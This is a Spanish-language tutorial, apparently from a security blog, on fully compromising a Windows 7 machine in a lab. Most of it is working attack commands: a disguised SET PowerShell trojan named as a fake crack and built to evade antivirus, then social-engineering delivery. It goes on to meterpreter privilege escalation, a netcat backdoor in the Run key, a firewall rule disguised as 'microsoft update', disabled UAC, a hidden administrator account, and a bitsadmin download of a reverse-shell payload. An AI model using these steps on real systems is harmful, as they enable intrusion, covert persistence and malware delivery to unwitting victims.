Windows 7 Intrusiòn

Windows 7 Intrusiòn

HackLat Nogal LabSec

Z – HackLat Nogal LabSec Intrusión Controlada a Sistemas Metodología de ataque a sistemas Windows 7 Hoy en día, una intrusión la tienen bastante facil los niños en especial por el exploit eternalblue Filtrado por "ShadowBroker" ; pero, ¿Qué hay en un ataque más elaborado? Si bien, un ataque de este tipo es un tanto viejo pero la metodología es la misma para hacer una intrusión a un sistema informático Windows 7 pero bien dicen, lo bueno no significa obsoleto Comencemos: ¿Que vamos hacer? Vamos a tomar el control completo de un sistema Windows 7 con antivirus y pondremos un backdoor para tener acceso cuando queramos ¿Que necesitamos? 2 maquinas virtuales: Windows 7 con antivirus y Kali Linux en la misma red . Buscamos a la victima Una de las opciones para buscar victimas en la red local es usar nmap, para ello vamos a lanzarlo para ver que equipos,puertos y sistema operativos están en esa red local. nmap --open -O 192.168.1.0/24

Mi víctima sera la ip 192.168.1.43 con varios puertos abiertos y por el resultado que nos ha dado sera un Windows 7 probablemente. Creando el payload Usaremos la aplicación setoolkit en Kali para realizarle un troyano a medida para conseguir acceso al sistema. Los parámetros serán: 1.-(1)Social-Engineering Atacks 2.-(10)Powershell Attack Vectors 3.-(1) Powershell Alphanumeric Shellcode Injector 4.- IP: 192.168.1.67 (Ip de kali) 5.-Port: 443 set> yes

Abrimos otra consola y nos dirigimos a la carpeta donde se genero con: cd /root/.set/reports/powershell Hacemos un ls y nos encontraremos x86_powershell_injecton.txt Ese archivo lo copiamos a nuestro escritorio con: cp x86_powershell_injecton.txt /root/Desktop Ahora me lo llevare a otro equipo, en este caso sera un windows para prepararlo. Abrimos el archivo con el bloc de notas y lo guardamos con un nombre con gancho, que la persona le tiente a darle en mi caso "crack_windows_7.bat"

Ahora lo transformaremos a un "fichero.exe" para ello usaremos Bat_to_exe _converter, lo descargamos, extraemos y ejecutamos como administrador. Cargamos el archivo bat y configuramos: Invisible applicaton (Para que no levante sospechas por el antivirus). Add administrator manifest (Sirve para que se ejecute con altos privilegios.) Y en la pestaña "versioninformations" introducimos los datos del producto fake que queramos para hacerlo mas creíble

En caso de tener antivirus activo habrá que desactivarlo para que al compilarlo no detecte el código malicioso y nos fastidie el proceso. Y ya tenemos nuestra aplicación creada.

Este archivo es el que debemos enviar a nuestra víctima, aquí tienes diferentes métodos de enviarlo (por correo,descarga de un servidor de archivos, facebook, pendrive...) y la forma que se os ocurra, esto se denomina ingeniería social. Yo lo envió a la maquina víctima. Ahora volvemos a nuestro metasploit que estará esperando a que sea ejecutado el programa

Por curiosidad lo analicé para ver si levanta sospechas y ves el resultado, es invisible para los antivirus. Lo que demuestra que los antivirus son una capa pero no la seguridad completa.

Y conseguimos ya la conexión, con una sesión de meterpreter.

Para elevar privilegios haremos lo siguiente: sysinfo para ver la informacion del sistema getuid: muestra el usuario que eres getsystem: consigue elevar privilegios a system getuid

Ahora vamos a backdoorizar el sistema: Para esto usaremos Netcat, una herramienta excelente para abrir puertos, asociarlo a una shell y forzar conexiones. Abrimos otra consola y ponemos: locate windows-binaries y hacemos cd /usr/share/windows-binaries y ls (El programa que nos interesa es nc.exe que es el netcat) ponemos pwd para saber la ruta que introduciremos

Y copiamos la dirección /usr/share/windows-binaries/nc.exe , y seguido ponemos la ruta en la que se subira en este caso lo guardaremos en System32 para poderlo llamar facilmente después. Con el comando upload previamente para subir el archivo. upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 *Esas doble barras son para que lo lea, en caso de poner una que no traiga la barra.

Mostramos del registro que software se ejecuta al iniciar: reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Ahora añadimos nuestro backdoor: reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v < nombre> -d 'C:\windows\system32\nc.exe -d - -p 12345 -e cmd.exe' Y comprobamos que se introdujo.

Para ver que es lo que hace: reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Microsoft

Pero si hacemos un nmap vemos que el puerto 12345 aún no está abierto, pero el backdoor si que esta funcionando.

Ahora necesitamos una consola de windows asi que: shell Lo primero es ver el estado del firewall: netsh firewall show state

Como ves, esta encendido

Ahora vemos los puertos abiertos, pero vemos que no nos lo muestra.

***En caso de que se caiga haremos: msfcli exploit/mult/handler PAYOAD= windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=334 E

Y doble click en el crack para volver a tener una sesión de meterpreter. Ahora abrimos el puerto: netsh advfirewall firewall add rule name=" microsoft update" dir=in acton=allow protocol=TCP localport=12345

Vamos a comprobar al PC de la máquina que se realizó correctamente, asi que entramos en el firewall en permitir un programa.....

Vemos que si ademas vemos que no somos los unicos con acceso y que hay un Poison Ivy, que es un RAT para controlar equipos troyanizados. Ahora desactivaremos el UAC (User Access Control), que es el que pide permisos al administrador para poder ejecutar cualquier programa. reg-exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ Policies\System /v Enable UA /t REG_DWORD /d 0 /f

Para comprobarlo podemos ir navegando por el regedit y verificarlo, aqui se puede comprender mejor el comando que introducimos antes.

Creamos un usuario de nombre y contraseña kali: net user kali kali /add

La metemos en el grupo administradores: net localgroup administradores kali /add

Y comprobamos que se creo correctamente:

Pero no podemos dejar esa cuenta visible, asi que modificaremos el registro para ocultarla. Usaremos la ruta HKLM\software\Microsoft/Windows

NT\CurrentVersion\Winlogon\specialaccounts "pero specialaccounts hay que crearla: reg add" "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\ specialaccounts Creamos una carpeta dentro de specialaccounts llamada userlist reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\specialaccounts\userlist" Configuramos la cuenta kali para que este oculta reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\ specialaccounts\userlist" /v kali /t REG_DWORD /d 0 /f

Y comprobamos como se oculto

Pero podemos ver todos los usuarios con: net user

También podemos ver gráficamente, inicio > botón derecho sobre equipo " Administrar" > Usuarios y grupos locales > Usuarios /*Necesitaríamos hacer otros cambios para ocultarlo en estos sitos*/

Ahora vamos a reiniciar a la víctima para ver si todo funciona correctamente. Meterpreter pierde la conexión.

Una vez reiniciado veremos nuestra obra, para comprobar los cambios que hemos hecho. Comprobamos que el UAC esta desactivado, para ello podemos clickear en cualquier archivo que necesite permisos de administrador para ejecutarse y no nos saldrá la ventana para aceptar.

Otra cosa interesante es probar comandos que antes teníamos con acceso denegado y ahora nos deja como es el caso de at, que es para ejecutar comandos a una hora determinada.

Ahora vamos a entrar por el backdoor que hemos creado. Lo primero que hacemos es lanzar un nmap para comprobar el estado de nuestro puerto. nmap 192.168.1.43

Y ahora con netcat nos conectamos, nc -vv 192.168.1.43 12345

Ahora vamos a descargar una imagen de internet al ordenador de la víctima bitsadmin /transfer mznlabsec /download /priority normal C:\mznlabsec.jpg

Ahora vamos a conseguir una consola de meterpreter descargandolas de nuestro server. Creamos un payload con msfpayload windows/meterpreter/reverse_tcp lhost =192.168.1.67 lport=1234 X > /var/www/shell.exe

/*Esto lo detectaría el antivirus, para esta práctica lo desactivamos*/ Lanzamos apache: service apache2 start

Creamos un trabajo al que añadiremos una o mas tareas para ejecutarlas con posterioridad: bitsadmin /create kali

Ahora añadimos la tarea a kali_linux: bitsadmin /add le kali_linux http://192 .168.1.67/shell.exe c:\Users\shell.exe

Y para ejecutarlo hacemos: bitsadmin /resume kali_linux

Podemos ver el estado de la ejecución introduciendo: bitsadmin /info kali_ linux , y para verlo mas destallado bitsadmin /info kali_linux /verbose

Otra opción interesante con bitsadmin es ver los trabajos, para verlos usaremos: bitsadmin /list

Y para analizar y ver el trabajo hacemos: bitsadmin /complete kali_linux

En nuestro Windows 7 ya aparece

Pues ya que esta vamos a realizar una conexion a esta shell: msfcli exploit/mult/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport= 1234 E

Ahora desde nuestra shell de windows, nos ponemos en la ruta y ejecutamos con: shell.exe

Y ahora ya realiza la conexion y obtenemos la shell de meterpreter Ahora ya podemos ejecutar un getsystem y seremos los jefes del equipo. Agradecimientos a Mayko por la confianza y paciencia :D